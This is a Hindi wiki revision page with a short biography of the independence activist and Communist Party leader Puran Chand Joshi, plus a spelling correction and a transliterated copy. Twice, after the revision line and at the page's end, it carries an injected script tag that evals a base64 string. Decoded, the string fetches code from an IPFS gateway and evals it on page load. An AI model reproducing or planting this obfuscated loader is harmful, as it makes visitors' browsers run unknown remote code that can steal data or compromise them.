Difference between revisions of "पूरन चन्द जोशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''पूरन चन्द जोशी''' का जन्म सन 1907 में हुआ थ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "सजा " to "सज़ा ")
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
'''पूरन चन्द जोशी''' का जन्म सन [[1907]] में हुआ था। वह स्वाधीनता सेनानी और भारतीय कम्युनिस्ट पार्टी के संस्थापक सदस्य थे। पूरन चन्द जोशी ने सन [[1929]] में मेरठ षड्यंत्र केस में सजा भी हुई थी। सन [[1936]] में कम्युनिस्ट पार्टी के महासचिव बने थे तथा सन [[1951]] में उन्होंने [[इलाहाबाद]] से 'इण्डिया टुडे' पत्रिका निकाली थी। पूरन चन्द जोशी का [[1980]] में निधन हो गया था।  
+
'''पूरन चन्द जोशी''' का जन्म सन [[1907]] में हुआ था। वह स्वाधीनता सेनानी और भारतीय कम्युनिस्ट पार्टी के संस्थापक सदस्य थे। पूरन चन्द जोशी ने सन [[1929]] में मेरठ षड्यंत्र केस में सज़ा भी हुई थी। सन [[1936]] में कम्युनिस्ट पार्टी के महासचिव बने थे तथा सन [[1951]] में उन्होंने [[इलाहाबाद]] से 'इण्डिया टुडे' पत्रिका निकाली थी। पूरन चन्द जोशी का [[1980]] में निधन हो गया था।  
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 13:42, 9 April 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

pooran chand joshi ka janm san 1907 mean hua tha. vah svadhinata senani aur bharatiy kamyunist parti ke sansthapak sadasy the. pooran chand joshi ne san 1929 mean merath shadyantr kes mean saza bhi huee thi. san 1936 mean kamyunist parti ke mahasachiv bane the tatha san 1951 mean unhoanne ilahabad se 'indiya tude' patrika nikali thi. pooran chand joshi ka 1980 mean nidhan ho gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>